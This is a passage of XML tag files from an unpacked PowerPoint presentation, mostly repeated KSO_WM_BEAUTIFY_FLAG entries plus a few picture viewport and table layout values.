<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag169.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag17.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag170.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag171.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag172.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag173.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag174.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag175.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag176.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag177.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag178.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag179.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag180.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag181.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag182.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag183.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag184.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag185.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag186.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag187.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag188.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag189.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag190.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag191.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag192.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag193.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag194.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag195.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag196.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag197.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag198.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag199.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag200.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag201.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag202.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag203.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag204.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag205.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag206.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag207.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag208.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag209.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag210.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag211.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag212.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag213.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag214.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag215.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag216.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag217.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag218.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag219.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag220.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag221.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag222.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag223.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag224.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag225.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag226.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag227.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag228.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag229.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag230.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag231.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag232.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{8a088103-e0f8-455a-b637-adc1bcbd6d65}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="493*207"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="251*190*493*207"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag233.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag234.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag235.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag236.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag237.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag238.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag239.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag24.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag240.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag241.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag242.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag243.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag244.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag245.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag246.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag247.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag248.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag249.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag250.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag251.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag252.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag253.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag254.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag255.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag256.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag257.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag258.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag259.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag26.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag260.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag261.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag262.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag263.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag264.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag265.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag266.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag267.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag268.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag269.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag27.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag270.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
